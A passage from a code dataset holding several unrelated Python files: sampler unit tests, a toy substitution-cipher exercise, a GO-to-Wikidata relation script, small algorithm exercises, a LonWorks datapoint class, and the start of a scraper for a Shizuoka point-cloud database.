val1 = 1-np.trace(A_inv.dot(P))\n\n #init guess used by optimizer does not contain\n #fixed trainign points already selected so add here \n greedy_samples = np.hstack([sampler.training_samples[:,:ntrain_samples],\n sampler.init_guess])\n A_inv = np.linalg.inv(kernel(greedy_samples.T))\n P = sampler.compute_P(greedy_samples)\n val2 = 1-np.trace(A_inv.dot(P))\n print(val1, val2)\n assert (val1 < val2)\n \n # plt.plot(sampler.training_samples[0, :],\n # sampler.training_samples[1, :], 'o')\n # plt.plot(sampler.greedy_sampler.training_samples[0, :],\n # sampler.greedy_sampler.training_samples[1, :], 'x')\n # plt.plot(sampler.init_guess[0, :],\n # sampler.init_guess[1, :], '^')\n # plt.show()\n\n def test_greedy_gauss_quadrature_ivar_sampler_I(self):\n nvars = 2\n variables = pya.IndependentMultivariateRandomVariable(\n [stats.beta(20, 20)]*nvars)\n generate_random_samples = partial(\n pya.generate_independent_random_samples, variables)\n\n kernel = pya.Matern(.1, length_scale_bounds='fixed', nu=np.inf)\n np.random.seed(1)\n sampler1 = GreedyIntegratedVarianceSampler(\n nvars, 100, 10, generate_random_samples,\n variables, use_gauss_quadrature=True, econ=True)\n sampler1.set_kernel(kernel)\n np.random.seed(1)\n sampler2 = GreedyIntegratedVarianceSampler(\n nvars, 100, 10, generate_random_samples,\n variables, use_gauss_quadrature=True, econ=False)\n sampler2.set_kernel(kernel)\n\n obj_vals1 = sampler1.objective_vals_econ()\n obj_vals2 = sampler2.objective_vals()\n assert np.allclose(obj_vals1, obj_vals2)\n pivot1 = sampler1.refine_econ()\n pivot2 = sampler2.refine_naive()\n assert np.allclose(pivot1, pivot2)\n\n for nsamples in range(1,5+1):\n #refine functions update internal variables so reset\n np.random.seed(1)\n sampler1 = GreedyIntegratedVarianceSampler(\n nvars, 50, 1000, generate_random_samples,\n variables, use_gauss_quadrature=True, econ=True)\n np.random.seed(1)\n sampler2 = GreedyIntegratedVarianceSampler(\n nvars, 50, 1000, generate_random_samples,\n variables, use_gauss_quadrature=True, econ=False)\n kernel = pya.Matern(.1, length_scale_bounds='fixed', nu=np.inf)\n sampler1.set_kernel(kernel)\n sampler2.set_kernel(kernel)\n #print('nsamples',nsamples)\n sampler1(nsamples)\n sampler2(nsamples)\n\n obj_vals1 = sampler1.objective_vals_econ()\n obj_vals2 = sampler2.objective_vals()\n obj_vals3 = sampler1.vectorized_objective_vals_econ()\n #print(obj_vals1, obj_vals2)\n #print(obj_vals1, obj_vals3)\n assert np.allclose(obj_vals1, obj_vals2)\n assert np.allclose(obj_vals1, obj_vals3)\n pivot1 = sampler1.refine_econ()\n pivot2 = sampler2.refine_naive()\n #print(pivot1, pivot2)\n assert np.allclose(pivot1, pivot2)\n\n def check_greedy_monte_carlo_ivar_sampler(\n self, nvars, kernel, kernels_1d):\n variables = pya.IndependentMultivariateRandomVariable(\n [stats.beta(20, 20)]*nvars)\n generate_random_samples = partial(\n pya.generate_independent_random_samples, variables)\n\n use_gauss_quadrature = False\n np.random.seed(1)\n sampler1 = GreedyIntegratedVarianceSampler(\n nvars, 2000, 1000, generate_random_samples,\n variables, use_gauss_quadrature=use_gauss_quadrature, econ=True,\n compute_cond_nums=True)\n sampler1.set_kernel(kernel, kernels_1d = kernels_1d)\n np.random.seed(1)\n sampler2 = GreedyIntegratedVarianceSampler(\n nvars, 2000, 1000, generate_random_samples,\n variables, use_gauss_quadrature=use_gauss_quadrature, econ=False,\n compute_cond_nums=True)\n sampler2.set_kernel(kernel, kernels_1d = kernels_1d)\n assert np.allclose(sampler1.pred_samples,sampler2.pred_samples)\n\n nsamples = 20\n # nsamples = 100\n \n t0 = time.time()\n samples1 = sampler1(nsamples)[0]\n assert np.allclose(\n sampler1.L[:nsamples, :nsamples],\n np.linalg.cholesky(kernel(sampler1.training_samples.T)))\n time1 = time.time()-t0\n print(time1)\n\n # samples = np.random.beta(20, 20, (nvars, 1000))\n samples = sampler1.pred_samples\n variance = gaussian_process_pointwise_variance(\n kernel, samples, sampler1.training_samples)\n assert np.allclose(variance.mean(), 1+sampler1.best_obj_vals[-1])\n\n t0 = time.time()\n samples2 = sampler2(nsamples)[0]\n time2 = time.time()-t0\n print(time1, time2)\n assert time1 < time2\n\n assert np.allclose(samples1, samples2)\n\n # if nvars !=2:\n # return\n # plt.plot(samples1[0,:], samples1[1,:], 'o')\n # plt.plot(samples2[0,:], samples2[1,:], 'x')\n # plt.figure()\n # print(np.arange(len(sampler1.cond_nums))+1,sampler1.cond_nums)\n # plt.loglog(np.arange(len(sampler1.cond_nums))+1,sampler1.cond_nums)\n # plt.loglog(np.arange(len(sampler2.cond_nums))+1,sampler2.cond_nums)\n # plt.show()\n\n def test_greedy_monte_carlo_ivar_sampler_II(self):\n #TODO Add check to IVAR and VarofMean samplers to make sure\n #kernel and 1d_kernels are consistent\n kernel = pya.Matern(.1, length_scale_bounds='fixed', nu=np.inf)\n kernels_1d = None\n self.check_greedy_monte_carlo_ivar_sampler(2, kernel, kernels_1d)\n\n kernel = pya.Matern(.1, length_scale_bounds='fixed', nu=2.5)\n kernels_1d = None\n self.check_greedy_monte_carlo_ivar_sampler(2, kernel, kernels_1d)\n\n def test_greedy_variance_of_mean_sampler(self):\n nvars = 2\n variables = pya.IndependentMultivariateRandomVariable(\n [stats.beta(20, 20)]*nvars)\n generate_random_samples = partial(\n pya.generate_independent_random_samples, variables)\n\n sampler = GreedyVarianceOfMeanSampler(\n nvars, 1000, 10, generate_random_samples,\n variables, use_gauss_quadrature=True, econ=True)\n kernel = pya.Matern(.4, length_scale_bounds='fixed', nu=np.inf)\n sampler.set_kernel(kernel)\n \n sampler.nmonte_carlo_samples = 100000\n sampler.precompute_monte_carlo()\n tau_mc = sampler.tau.copy()\n sampler.nmonte_carlo_samples = 50\n sampler.precompute_gauss_quadrature()\n tau_gq = sampler.tau.copy()\n #print((tau_mc-tau_gq)/tau_mc)\n assert np.allclose(tau_mc, tau_gq, rtol=1e-2)\n\n kernel = pya.Matern(.1, length_scale_bounds='fixed', nu=np.inf)\n\n use_gauss_quadrature = False\n nquad_samples = 10000\n # use_gauss_quadrature = True\n # nquad_samples = 50\n np.random.seed(1)\n sampler1 = GreedyVarianceOfMeanSampler(\n nvars, nquad_samples, 1000, generate_random_samples,\n variables, use_gauss_quadrature=use_gauss_quadrature, econ=True,\n compute_cond_nums=True)\n sampler1.set_kernel(kernel)\n \n ntrain_samples = 20\n new_samples11 = sampler1(ntrain_samples)[0]\n new_samples12 = sampler1(2*ntrain_samples)[0]\n\n np.random.seed(1)\n sampler2 = GreedyVarianceOfMeanSampler(\n nvars, nquad_samples, 1000, generate_random_samples,\n variables, use_gauss_quadrature=use_gauss_quadrature, econ=False,\n compute_cond_nums=True)\n sampler2.set_kernel(kernel)\n\n new_samples21 = sampler2(ntrain_samples)[0]\n new_samples22 = sampler2(2*ntrain_samples)[0]\n\n # plt.plot(sampler1.training_samples[0, :],\n # sampler1.training_samples[1, :], 'o')\n # plt.plot(sampler2.training_samples[0, :],\n # sampler2.training_samples[1, :], 'x')\n # plt.figure()\n # print(np.arange(len(sampler1.cond_nums))+1,sampler1.cond_nums)\n # plt.loglog(np.arange(len(sampler1.cond_nums))+1,sampler1.cond_nums)\n # plt.loglog(np.arange(len(sampler2.cond_nums))+1,sampler2.cond_nums)\n # plt.show()\n \n assert np.allclose(new_samples11, new_samples21)\n # Note: The sequences computed with econ on and off will diverge\n # when the sample sets produce a kernel matrix with a large condition\n # number\n assert np.allclose(new_samples12, new_samples22)\n \n def compare_ivar_samplers(self):\n nvars = 2\n variables = pya.IndependentMultivariateRandomVariable(\n [stats.beta(20, 20)]*nvars)\n generate_random_samples = partial(\n pya.generate_independent_random_samples, variables)\n\n # correlation length affects ability to check gradient. As kerenl matrix\n # gets more ill conditioned then gradients get worse\n kernel = pya.Matern(.1, length_scale_bounds='fixed', nu=np.inf)\n sampler = IVARSampler(\n nvars, 1000, 1000, generate_random_samples, variables, 'ivar')\n sampler.set_kernel(kernel)\n\n ntrain_samples = 10\n new_samples1 = sampler(ntrain_samples)[0]\n\n new_samples2 = sampler(2*ntrain_samples)[0]\n\n assert np.allclose(\n sampler.training_samples[:, :ntrain_samples], new_samples1,\n atol=1e-12)\n\n np.random.seed(1)\n sampler2 = IVARSampler(\n nvars, 1000, 1000, generate_random_samples, variables, 'chol')\n sampler2.set_kernel(kernel)\n \n def weight_function(samples):\n return np.prod([variables[ii].pdf(samples[ii,:])\n for ii in range(samples.shape[0])],axis=0)\n \n sampler2.set_weight_function(weight_function)\n \n sampler2(ntrain_samples)\n sampler2(ntrain_samples*2) \n \n # plt.plot(sampler.training_samples[0, :],\n # sampler.training_samples[1, :], 'o')\n # plt.plot(sampler2.training_samples[0, :],\n # sampler2.training_samples[1, :], 'x')\n # plt.show()\n\n \nif __name__ == \"__main__\":\n gaussian_process_test_suite = unittest.TestLoader().loadTestsFromTestCase(\n TestGaussianProcess)\n unittest.TextTestRunner(verbosity=2).run(gaussian_process_test_suite)\n sampler_test_suite = unittest.TestLoader().loadTestsFromTestCase(\n TestSamplers)\n unittest.TextTestRunner(verbosity=2).run(sampler_test_suite)\n \n \n","sub_path":"pyapprox/tests/test_gaussian_process.py","file_name":"test_gaussian_process.py","file_ext":"py","file_size_in_byte":58854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"421459103","text":"\"\"\"\nIn this exercise, you will create a Python class for creating simple\nsubstitution ciphers. You are free to implement the required functionality\nhowever you would like, but I highly recommend using Python's string\nmaketrans() method.\n\nImagine that you want to replace all the lower case letters of the alphabet\nwith the corresponding letter of the reverse alphabet (i.e, you want to replace\na with z, b with y, c with x, d with w, and so on.)\n\nFirst let's create a string of the lower case letters:\n\n>>> alphabet = \"abcdefghijklmnopqrstuvwxyz\"\n\nNow let's reverse the alphabet:\n\n>>> alphabet[::-1]\n'zyxwvutsrqponmlkjihgfedcba'\n>>> key = alphabet[::-1]\n\nYou can now make a little translation table using maketrans by passing it a\nstring containing the characters you want to replace and anoter string with the\ncharacters you them to be replaced by:\n\n>>> import string\n>>> translator = string.maketrans(alphabet, key)\n\nNote that you can give it any characters you want not just letters. But the\ntwo strings that you call maketrans with must be the same length.\n\nNow you can call the translate method of any string with the translation table\nand it will return the translated message.\n\n>>> msg = \"hello\"\n>>> msg.translate(translator)\n'svool'\n>>> coded = msg.translate(translator)\n>>> decoded = coded.translate(translator)\n>>> decoded\n'hello'\n\"\"\"\n\nimport string\n\nclass Cipher(object):\n \"\"\"\n >>> reverse = Cipher(\"reverse\")\n >>> reverse.encrypt(\"hello\")\n 'svool'\n >>> reverse.decrypt(\"svool\")\n 'hello'\n >>> rot13 = Cipher(\"rot13\")\n >>> rot13.encrypt(\"hello\")\n 'uryyb'\n >>> rot13.encrypt(\"abcdefghijklmnopqrstuvwxyz\")\n 'nopqrstuvwxyzabcdefghijklm'\n >>> rot13.isvalid(\"hello\")\n True\n >>> rot13.isvalid(\"H3aff\")\n False\n >>> hybrid = Cipher(\"hybrid\")\n >>> hybrid.encrypt(\"abcdefghijklmnopqrstuvwxyz\")\n 'nmlkjihgfedcbazyxwvutsrqpo'\n \"\"\"\n\n def __init__(self, mapping):\n \"\"\"\n The constructor method.\n \"\"\"\n self.alphabet = \"abcdefghijklmnopqrstuvwxyz\"\n a = self.alphabet\n if mapping == \"reverse\":\n key = a[::-1]\n elif mapping == \"rot13\":\n key = a[13:] + a[:13]\n elif mapping == \"hybrid\":\n key = a[13::-1] + a[:13:-1]\n else:\n raise ValueError(\"Mapping must be 'reverse', 'rot13', or 'hybrid', was %s.\" % value)\n self.translator = string.maketrans(a, key)\n\n def isvalid(self, message):\n \"\"\"\n Checks whether a string is a valid for this class.\n \n Parameters\n ----------\n message : string\n A string (i.e., you can assume you get a string)\n \n Returns\n -------\n out : bool\n Returns True, if message is only composed of letters\n in our alphabet (and False otherwise).\n \"\"\"\n return set(message).issubset(set(self.alphabet))\n\n def encrypt(self, message):\n \"\"\"\n Encrypt the message\n \n Parameters\n ----------\n message: string\n A string (i.e., you can assume you get a string)\n \n Returns\n -------\n out : string\n \"\"\"\n return message.translate(self.translator)\n \n def decrypt(self, message):\n \"\"\"\n Decrypt the message\n \n Parameters\n ----------\n message: string\n A string (i.e., you can assume you get a string)\n \n Returns\n -------\n out : string\n \"\"\"\n return message.translate(self.translator)\n\n\nif __name__ == \"__main__\":\n import doctest\n doctest.testmod()\n","sub_path":"ex2/cipher-solution.py","file_name":"cipher-solution.py","file_ext":"py","file_size_in_byte":3608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"646433357","text":"\nimport pronto, six, csv\nfrom sys import *\n\nreader = csv.DictReader(open('chebi.tab', 'r'), delimiter='\\t')\nqs = {}\ndups = set()\nfor item in reader:\n iturl = item.get('item')\n qit = iturl[iturl.rfind('/')+1:]\n chid = 'CHEBI:' + item.get('ch')\n g = qs.get(chid)\n if g is None:\n qs[chid] = qit\n else:\n dups.add(chid)\n\nreader = csv.DictReader(open('goid.tab', 'r'), delimiter='\\t')\nefs = {}\nfor item in reader:\n go = item.get('goid')\n iturl = item.get('item')\n it = iturl[iturl.rfind('/')+1:]\n git = efs.get(go)\n if git is None:\n efs[go] = it\n else:\n print('============= {}'.format(go))\n\nignore = {'425228', '144646', '27941'}\n\nsecondary = {'365419':'64090', '12800':'46570', '24036':'72010',\n '425228':'29484', '578003':'65172', '22318':'134249',\n '30410':'42121', '3736':'48947', '593038':'49537',\n '198346':'41688', '22473':'32988', '3669':'16822',\n '23008':'16646', '3736':'48947', '578003':'65172'}\n\nont = pronto.Ontology('/home/ralf/go-ontology/src/ontology/go-edit.obo')\n\nfor term in ont.terms.values():\n goid = term.id\n if goid[:3] != 'GO:':\n continue\n goit = efs.get(goid)\n if goit is None:\n continue\n rel = term.relations\n for relstr in ['has_input', 'has_intermediate', 'has_output', 'has_participant', 'has_part', 'exports', 'transports_or_maintains_localization_of']:\n R = pronto.relationship.Relationship(relstr)\n ix = rel.get(R)\n if ix is None:\n continue\n #ns = term.other.get('namespace')\n #if ns[0] != 'biological_process':\n # continue\n for term in ix:\n chid = term.id\n chit = qs.get(chid)\n if chid in dups or chit is None:\n continue\n type = relstr\n if type == 'has_output' or type == 'has_primary_output':\n print('{}|P527|{}|P3831|Q542929|S248|Q75154902'.format(goit, chit))\n #print('-{}|P361|{}'.format(chit, goit))\n print('{}|P361|{}|P2868|Q542929|S248|Q75154902'.format(chit, goit))\n if type == 'has_input' or type == 'has_primary_input':\n print('{}|P527|{}|P3831|Q45342565|S248|Q75154902'.format(goit, chit))\n #print('-{}|P361|{}'.format(chit, goit))\n print('{}|P361|{}|P2868|Q45342565|S248|Q75154902'.format(chit, goit))\n if type == 'has_intermediate':\n print('{}|P527|{}|P3831|Q7458208|S248|Q75154902'.format(goit, chit))\n #print('-{}|P361|{}'.format(chit, goit))\n print('{}|P361|{}|P2868|Q7458208|S248|Q75154902'.format(chit, goit))\n if type == 'has_participant' or type == 'has_primary_input_or_output':\n print('{}|P527|{}|P3831|Q75232720|S248|Q75154902'.format(goit, chit))\n #print('-{}|P361|{}'.format(chit, goit))\n print('{}|P361|{}|P2868|Q75232720|S248|Q75154902'.format(chit, goit))\n if type == 'has_part':\n print('{}|P527|{}|S248|Q75154902'.format(goit, chit))\n print('{}|P361|{}|S248|Q75154902'.format(chit, goit))\n if type == 'transports_or_maintains_localization_of' or type == 'exports':\n print('{}|P527|{}|P3831|Q75152245|S248|Q75154902'.format(goit, chit))\n print('{}|P361|{}|P2868|Q75152245|S248|Q75154902'.format(chit, goit))\n\"\"\"\n\"\"\"\n\n","sub_path":"go-relations.py","file_name":"go-relations.py","file_ext":"py","file_size_in_byte":3425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"598722126","text":"#take inputs from keyboard\ndef inputs():\n a, b = input().split()\n c = str(input())\n return int(a), float(b), c\n\n#calculate AT|GC content of given string\ndef content(given_s):\n at, gc = 0, 0\n for base in given_s:\n if base == 'A' or base == 'T':\n at += 1\n if base == 'G' or base == 'C':\n gc += 1\n return at, gc\n\n#probability calculation\ndef calc(given_x, given_AT, given_GC, given_N):\n #probability of getting string == s, with GC content x; formula from http://rosalind.info/problems/prob/\n prob = (((1 - given_x) / 2) ** given_AT) * (((given_x) / 2) ** given_GC) \n #probability in question\n ans = 1 - (1 - prob) ** given_N\n return ans \n \nif __name__ == \"__main__\":\n N, x, s = inputs()\n AT, GC = content(s)\n print('%0.3f' % calc(x, AT, GC, N))\n","sub_path":"hw2.py","file_name":"hw2.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"566401841","text":"class Solution(object):\n def shortestWordDistance(self, words, word1, word2):\n \"\"\"\n :type words: List[str]\n :type word1: str\n :type word2: str\n :rtype: int\n \"\"\"\n wordMap = {word1:-float('inf'), word2: -float('inf')}\n minDist = float(\"inf\")\n for i in xrange(len(words)):\n if words[i] == word1:\n minDist = min(i - wordMap[word2], minDist)\n wordMap[word1] = i\n elif words[i] == word2:\n minDist = min(i - wordMap[word1], minDist)\n wordMap[word2] = i\n return minDist","sub_path":"245_shortest_word_distance_III/hashmap.py","file_name":"hashmap.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"489049204","text":"import sys\nimport json\nimport traceback\n\nargs = sys.argv[1:]\n\n\nfor arg in args:\n try:\n file = open(arg, 'r')\n text = file.read()\n jsonData = json.loads(text)\n file.close()\n\n for skinName in jsonData[\"skins\"][\"default\"]:\n skinSubName = next(iter(jsonData[\"skins\"][\"default\"][skinName]))\n skin = jsonData[\"skins\"][\"default\"][skinName][skinSubName]\n\n if \"type\" in skin:\n if skin[\"type\"] == \"mesh\":\n vertices = skin[\"vertices\"]\n for i in range(0, len(vertices), 2):\n # vertices[i] = vertices[i]*-1\n vertices[i + 1] = vertices[i + 1] * -1\n\n file = open(arg, 'w')\n file.write(json.dumps(jsonData, indent=2, separators=(\",\", \": \")))\n file.close()\n except Exception:\n traceback.print_exc()\n input(\"Press enter to close\")","sub_path":"meshOnlyFlipper.py","file_name":"meshOnlyFlipper.py","file_ext":"py","file_size_in_byte":920,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"123183652","text":"\"\"\"ex_control standard datapoint type, originally defined in resource file\nset standard 00:00:00:00:00:00:00:00-0. \"\"\"\n\n\n# Copyright (C) 2013 Echelon Corporation. All Rights Reserved.\n\n# Permission is hereby granted, free of charge, to any person obtaining a\n# copy of this software and associated documentation files (the \"Software\" to\n# deal in the Software without restriction, including without limitation the\n# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or\n# sell copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING\n# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER\n# DEALINGS IN THE SOFTWARE.\n\n# This file is generated from device resource files using an automated\n# database to source code conversion process. Grammar and punctuation within\n# the embedded documentation may not be correct, as this data is gathered and\n# combined from several sources. The machine-generated code may not meet\n# compliance with PEP-8 and PEP-257 recommendations at all times.\n# Generated at 23-Sep-2013 09:14.\n\nimport pylon.resources.base\nfrom pylon.resources.standard import standard\nimport pylon.resources.enumerations.ex_control_t\n\n\nclass ex_control(pylon.resources.base.Structure):\n \"\"\"ex_control standard datapoint type. Exclusive control. (status,\n address.).\"\"\"\n\n class control_device_addrType(pylon.resources.base.Structure):\n\n def __init__(self):\n super().__init__(\n key=-1,\n scope=-1\n )\n\n self.__domain_id = pylon.resources.base.Array(\n [\n pylon.resources.base.Scaled(\n size=1,\n signed=False,\n minimum=0,\n maximum=255\n ) for i in range(6)\n ]\n )\n self._register(('domain_id', self.__domain_id))\n\n self.__domain_length = pylon.resources.base.Scaled(\n size=1,\n signed=False,\n minimum=0,\n maximum=6\n )\n self._register(('domain_length', self.__domain_length))\n\n self.__subnet = pylon.resources.base.Scaled(\n size=1,\n signed=False,\n invalid=0,\n minimum=0,\n maximum=255\n )\n self._register(('subnet', self.__subnet))\n\n self.__node = pylon.resources.base.Scaled(\n size=1,\n signed=False,\n invalid=0,\n minimum=0,\n maximum=127\n )\n self._register(('node', self.__node))\n\n def __set_domain_id(self, v):\n self.__domain_id._value = v\n\n domain_id = property(\n lambda self: self.__domain_id._value,\n __set_domain_id,\n None,\n \"\"\"Domain ID. ANSI/CEA-709.1 domain ID. (array of 6 bytes.).\"\"\"\n )\n\n def __set_domain_length(self, v):\n self.__domain_length._value = v\n\n domain_length = property(\n lambda self: self.__domain_length._value,\n __set_domain_length,\n None,\n \"\"\"Domain length. Valid domain lengths are 0, 1, 3, and 6.\n (ANSI/CEA-709.1 domain length.).\"\"\"\n )\n\n def __set_subnet(self, v):\n self.__subnet._value = v\n\n subnet = property(\n lambda self: self.__subnet._value,\n __set_subnet,\n None,\n \"\"\"Subnet There can be 255 subnets (1-255) in a domain. (subnet\n number.).\"\"\"\n )\n\n def __set_node(self, v):\n self.__node._value = v\n\n node = property(\n lambda self: self.__node._value,\n __set_node,\n None,\n \"\"\"Node There can be 127 nodes (1-127) in a subnet. (node\n number.).\"\"\"\n )\n\n def __set(self, v):\n if not isinstance(v, type(self)):\n raise TypeError(\n 'Expected instance of {0}, got {1}'.format(\n type(self),\n type(v)\n )\n )\n self.__set_domain_id(v.__domain_id)\n self.__set_domain_length(v.__domain_length)\n self.__set_subnet(v.__subnet)\n self.__set_node(v.__node)\n\n _value = property(lambda self: self, __set)\n\n def __len__(self):\n \"\"\"Return the length of the type, in bytes.\"\"\"\n return 9\n\n def __init__(self):\n super().__init__(\n key=157,\n scope=0\n )\n\n self.__control_status = pylon.resources.enumerations.ex_control_t.ex_control_t(\n )\n self._register(('control_status', self.__control_status))\n\n self.__control_device_addr = ex_control.control_device_addrType(\n )\n self._register(('control_device_addr', self.__control_device_addr))\n self._original_name = 'SNVT_ex_control'\n self._definition = standard.add(self)\n\n\n def __set_control_status(self, v):\n self.__control_status._value = v\n\n control_status = property(\n lambda self: self.__control_status._value,\n __set_control_status,\n None,\n \"\"\"Control type. (control type names.).\"\"\"\n )\n\n def __set_control_device_addr(self, v):\n self.__control_device_addr._value = v\n\n control_device_addr = property(\n lambda self: self.__control_device_addr._value,\n __set_control_device_addr,\n None,\n \"\"\"Control device address. (LonWorks subnet-node address.).\"\"\"\n )\n\n def __set(self, v):\n if not isinstance(v, type(self)):\n raise TypeError(\n 'Expected instance of {0}, got {1}'.format(\n type(self),\n type(v)\n )\n )\n self.__set_control_status(v.__control_status)\n self.__set_control_device_addr(v.__control_device_addr)\n\n _value = property(lambda self: self, __set)\n\n def __len__(self):\n \"\"\"Return the length of the type, in bytes.\"\"\"\n return 10\n\n\nif __name__ == '__main__':\n # unit test code.\n item = ex_control()\n pass\n","sub_path":"pylon/resources/datapoints/ex_control.py","file_name":"ex_control.py","file_ext":"py","file_size_in_byte":6832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"411576389","text":"import urllib.request, urllib.parse\nimport json\nimport time\n\ndef getMarkers():\n #全件取得するために、静岡県全域が含まれる緯度経度を整数値で設定\n xMax = 140\n xMin = 137\n yMax = 36\n yMin = 33\n\n params = {\n 'request':'MarkerSet',\n 'Xmax':xMax,\n 'Xmin':xMin,\n 'Ymax':yMax,\n 'Ymin':yMin\n }\n p = urllib.parse.urlencode(params)\n\n url = \"https://pointcloud.pref.shizuoka.jp/lasmap/ankenmapsrc?\" + p\n\n #上記で生成したURLパラメータでSIZUOKA POINT CLOUD DBにリクエストし案件一覧文字列を取得\n allAnkenStr = \"\"\n with urllib.request.urlopen(url) as res:\n allAnkenStr = res.read().decode()\n\n #以下はDBから得られる文字列のサンプル\n #本来は改行されていない\n\n #30XXX01010001:平成30年度韮山反射炉計測業務:138.96214537214:35.03962001009?\n #28XXX00030007:白糸の滝滝見橋周辺整備事業 その7:138.58870495572:35.312506370532?\n #28XXX00030008:白糸の滝滝見橋周辺整備事業 その8:138.58881502806:35.312596432406?\n #28XXX00030009:白糸の滝滝見橋周辺整備事業 その9:138.58892510063:35.312686494178?\n #29C2001011361:平成29年度[第29-C2001-01号] 伊豆半島の屋外広告物の実態調査業務委託(函南町道_1-2号線):138.93794860595:35.083520492945\n\n #案件ごとの区切りは'?'、1案件中の区切りは':'である\n\n ankensObj = {\n \"ankenList\":[]\n }\n\n ankenList = allAnkenStr.split('?')\n for anken in ankenList:\n ankenInfo = anken.split(':')\n #不適切なデータがあった場合、スキップする\n if len(ankenInfo) != 4:\n continue\n\n #和暦を西暦に変換\n yy = int(ankenInfo[0][:2])\n #令和\n if yy < 24:\n yyyy = 2018 + yy\n else:\n yyyy = 1988 + yy\n\n ankenObj = {\n \"no\":ankenInfo[0],\n \"name\":ankenInfo[1],\n \"lon\":ankenInfo[2],\n \"lat\":ankenInfo[3],\n \"year\":yyyy\n }\n ankensObj['ankenList'].append(ankenObj)\n return ankensObj\n\nimport bs4\ndef getAnkenDetail(ankenNo):\n params = {\n 'ankenno':ankenNo\n }\n p = urllib.parse.urlencode(params)\n url = \"https://pointcloud.pref.shizuoka.jp/lasmap/ankendetail?\" + p\n\n opener = urllib.request.build_opener()\n opener.addheaders = [\n ('Referer', 'http://localhost'),\n ('User-Agent', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36 Edg/79.0.309.65'),\n ]\n\n html = opener.open(url)\n soup = bs4.BeautifulSoup(html, features='html.parser')\n #